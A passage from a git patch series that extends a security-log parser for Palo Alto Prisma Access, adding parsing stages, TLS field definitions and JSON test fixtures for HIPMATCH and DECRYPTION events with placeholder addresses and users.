Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -46,6 +46,7 @@ "88.120.236.74" ], "user": [ + "example.org", "test" ] }, @@ -61,8 +62,8 @@ } }, "user": { - "domain": "example.org", - "name": "test" + "domain": "test", + "name": "example.org" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index f08a677ef..5cc8690a2 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -49,7 +49,8 @@ "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -64,8 +65,8 @@ } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json index dee27d0e1..48cbcdca5 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json @@ -44,7 +44,7 @@ "1.2.3.4" ], "user": [ - "JDOE" + "test.fr" ] }, "source": { @@ -53,8 +53,8 @@ "port": 0 }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" } } } \ No newline at end of file From 497fb289a176e5b2a21ed5e52b294cc18afd8120 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:47:10 +0100 Subject: [PATCH 60/84] test(PaloAlto): add test for hipmatch event in json representation --- .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json new file mode 100644 index 000000000..45f8d34f8 --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file From e314c268cf04780877f6b195703ac7f420bfa0b2 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:48:59 +0100 Subject: [PATCH 61/84] fix(PaloAlto): extract host id and rule name for HIPMatch --- Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml | 4 ++-- .../paloalto-prisma-access/tests/globalprotect_csv.json | 1 + .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 1 + .../paloalto-prisma-access/tests/test_globalprotect.json | 1 + .../paloalto-prisma-access/tests/test_hipmatch_json.json | 4 ++++ .../paloalto-prisma-access/tests/test_new_globalprotect.json | 1 + 6 files changed, 10 insertions(+), 2 deletions(-) diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 84514974e..07492992b 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -577,7 +577,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" @@ -602,7 +602,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e0cb016eb..e51f19fbb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index 5cc8690a2..70c31c202 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json index 45f8d34f8..fd4e5a75f 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From fd17ed126f555368791cad8216454c1bb8fd7d33 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:51:21 +0100 Subject: [PATCH 62/84] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-prisma-access/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 07492992b..63f72e8e0 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -382,6 +382,49 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..140e7657e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From f35315945b88ff7a1085f7d2e531cac1196f78d8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:55:42 +0100 Subject: [PATCH 63/84] fix(PaloAlto): improve support for decryption events --- .../paloalto-prisma-access/_meta/fields.yml | 15 +++ .../paloalto-prisma-access/ingest/parser.yml | 10 ++ .../tests/test_decryption_json.json | 119 ++++++++++++++++++ 3 files changed, 144 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml index 6382be28b..3b3fd8fc6 100644 --- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml @@ -297,3 +297,18 @@ paloalto.threat.name: description: The name of the threat name: paloalto.threat.name type: keyword + +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 63f72e8e0..8da957210 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -636,6 +636,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -809,6 +816,9 @@ stages: paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}" paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}" paloalto.threat.name: "{{parsed_threat.message.threat_description}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: source.user.name: "{{parsed_event.message.SourceUser}}" user.name: "{{parsed_event.message.SourceUser}}" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json new file mode 100644 index 000000000..35fa4abec --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json @@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } +} \ No newline at end of file From c93a4a974e1e4417b0c7e4496cfc9327ed6b3160 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:57:01 +0100 Subject: [PATCH 64/84] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-prisma-access/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 8da957210..d212c5fcc 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -425,6 +425,124 @@ pipeline: - ClusterName delimiter: "," + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + 